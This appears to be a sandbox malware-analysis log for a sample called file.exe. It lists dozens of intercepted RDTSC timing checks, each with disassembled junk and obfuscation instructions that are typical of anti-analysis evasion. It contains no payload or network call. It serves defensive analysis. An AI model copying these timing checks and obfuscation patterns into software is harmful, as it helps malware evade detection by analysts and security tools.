Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5069 second address: EF5083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CE02A36h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6F7A second address: EF6F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6F7E second address: EF6F82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF701E second address: EF7022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7022 second address: EF7045 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push ecx 0x00000009 ja 00007F4A4CE02A2Ch 0x0000000f pop ecx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 jng 00007F4A4CE02A2Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7045 second address: EF704D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF704D second address: EF7067 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4A4CE02A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4A4CE02A2Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7600 second address: EF7604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7604 second address: EF760A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF760A second address: EF7614 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4A4CCE842Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7C96 second address: EF7CC3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, ebx 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F4A4CE02A28h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push edi 0x00000026 pop edi 0x00000027 push eax 0x00000028 pop eax 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7CC3 second address: EF7CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A4CCE8438h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7CDF second address: EF7CF1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4A4CE02A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7CF1 second address: EF7CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7CF8 second address: EF7CFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7DA9 second address: EF7DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7F34 second address: EF7F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7F38 second address: EF7F3E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF87B5 second address: EF87BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF87BB second address: EF87CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F4A4CCE8426h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF87CF second address: EF884E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CE02A2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F4A4CE02A28h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F4A4CE02A28h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 jmp 00007F4A4CE02A2Ah 0x00000048 xchg eax, ebx 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F4A4CE02A39h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF884E second address: EF8878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CCE8437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F4A4CCE842Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF9209 second address: EF9212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF9212 second address: EF92C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CCE842Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jo 00007F4A4CCE8430h 0x00000012 jmp 00007F4A4CCE842Ah 0x00000017 popad 0x00000018 nop 0x00000019 ja 00007F4A4CCE8432h 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007F4A4CCE8428h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b movsx edi, cx 0x0000003e or dword ptr [ebp+122D3025h], edi 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push edx 0x00000049 call 00007F4A4CCE8428h 0x0000004e pop edx 0x0000004f mov dword ptr [esp+04h], edx 0x00000053 add dword ptr [esp+04h], 0000001Bh 0x0000005b inc edx 0x0000005c push edx 0x0000005d ret 0x0000005e pop edx 0x0000005f ret 0x00000060 mov dword ptr [ebp+122D25B8h], edi 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a push ecx 0x0000006b pop ecx 0x0000006c jmp 00007F4A4CCE8433h 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFA3EE second address: EFA3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF9AEC second address: EF9AFA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4A4CCE8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFAE62 second address: EFAE79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CE02A33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFAE79 second address: EFAEE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CCE8431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D21F0h], edx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F4A4CCE8428h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 jmp 00007F4A4CCE842Bh 0x00000035 xchg eax, ebx 0x00000036 jnl 00007F4A4CCE843Ah 0x0000003c push eax 0x0000003d pushad 0x0000003e push ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFAEE4 second address: EFAEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB963 second address: EFB968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC344 second address: EFC370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CE02A35h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4A4CE02A30h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCEA4 second address: EFCEA9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFD101 second address: EFD12A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F4A4CE02A36h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 js 00007F4A4CE02A26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFD12A second address: EFD18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a nop 0x0000000b mov esi, 4C0D7FA6h 0x00000010 mov dword ptr [ebp+122D3025h], esi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F4A4CCE8428h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 push ebx 0x00000033 sub edi, 5AE76982h 0x00000039 pop esi 0x0000003a push 00000000h 0x0000003c pushad 0x0000003d and ch, FFFFFFA7h 0x00000040 popad 0x00000041 push eax 0x00000042 pushad 0x00000043 jmp 00007F4A4CCE8433h 0x00000048 pushad 0x00000049 push eax 0x0000004a pop eax 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFDBFD second address: EFDC02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFD970 second address: EFD982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A4CCE842Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFDC02 second address: EFDC8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CE02A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F4A4CE02A28h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F4A4CE02A28h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push eax 0x00000047 call 00007F4A4CE02A28h 0x0000004c pop eax 0x0000004d mov dword ptr [esp+04h], eax 0x00000051 add dword ptr [esp+04h], 0000001Ch 0x00000059 inc eax 0x0000005a push eax 0x0000005b ret 0x0000005c pop eax 0x0000005d ret 0x0000005e xchg eax, ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 je 00007F4A4CE02A28h 0x00000067 push edi 0x00000068 pop edi 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0210A second address: F02110 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F02110 second address: F0218F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CE02A2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F4A4CE02A28h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 sub dword ptr [ebp+122D3158h], esi 0x0000002e mov bx, 4926h 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D34F2h], esi 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F4A4CE02A28h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 mov bl, 07h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b ja 00007F4A4CE02A28h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F02F4C second address: F02F50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F02322 second address: F02326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F03FA4 second address: F03FAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F04F34 second address: F04F3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F06E7A second address: F06E7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F06070 second address: F06074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F07CDD second address: F07CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A4CCE8431h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F07081 second address: F07085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F08C43 second address: F08C97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CCE8437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F4A4CCE8428h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 or bh, FFFFFF95h 0x00000029 push 00000000h 0x0000002b mov edi, dword ptr [ebp+122D1A32h] 0x00000031 push 00000000h 0x00000033 cld 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F08C97 second address: F08C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F07EEA second address: F07EEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F08E54 second address: F08E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F08E58 second address: F08E68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CCE842Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0DD66 second address: F0DD79 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4A4CE02A28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0DD79 second address: F0DD83 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4A4CCE842Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0AE71 second address: F0AE77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0FE44 second address: F0FE61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CCE8439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0FE61 second address: F0FE74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jo 00007F4A4CE02A26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0FE74 second address: F0FE7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0CE3B second address: F0CEE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F4A4CE02A38h 0x0000000b nop 0x0000000c xor dword ptr [ebp+122D35F1h], esi 0x00000012 push dword ptr fs:[00000000h] 0x00000019 or dword ptr [ebp+122D198Ah], edx 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 pushad 0x00000027 jmp 00007F4A4CE02A2Bh 0x0000002c call 00007F4A4CE02A2Eh 0x00000031 mov ecx, dword ptr [ebp+122D3858h] 0x00000037 pop ecx 0x00000038 popad 0x00000039 movsx edi, dx 0x0000003c mov eax, dword ptr [ebp+122D05B9h] 0x00000042 jnc 00007F4A4CE02A2Bh 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F4A4CE02A28h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 0000001Dh 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 xor di, E7D1h 0x00000069 push eax 0x0000006a js 00007F4A4CE02A34h 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0CEE1 second address: F0CEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0FE7A second address: F0FEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 nop 0x00000007 jbe 00007F4A4CE02A26h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F4A4CE02A28h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 or bx, E18Eh 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D2533h], ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09F00 second address: F09F0E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4A4CCE8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09F0E second address: F09F73 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4A4CE02A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c movzx edi, di 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F4A4CE02A28h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov bx, 340Fh 0x0000003b mov eax, dword ptr [ebp+122D103Dh] 0x00000041 mov bx, 877Ah 0x00000045 push FFFFFFFFh 0x00000047 jmp 00007F4A4CE02A2Ch 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 push ecx 0x00000051 pop ecx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09F73 second address: F09F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09F78 second address: F09F7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F11008 second address: F11013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09F7E second address: F09F8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09F8D second address: F09F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09F91 second address: F09F9B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4A4CE02A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F10051 second address: F10057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F19786 second address: F197A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CE02A37h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F197A1 second address: F197D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jbe 00007F4A4CCE8426h 0x0000000f jmp 00007F4A4CCE842Dh 0x00000014 jmp 00007F4A4CCE8435h 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1919A second address: F1919E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1919E second address: F191A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1EAC8 second address: F1EAD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A4CE02A2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1EAD9 second address: F1EADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
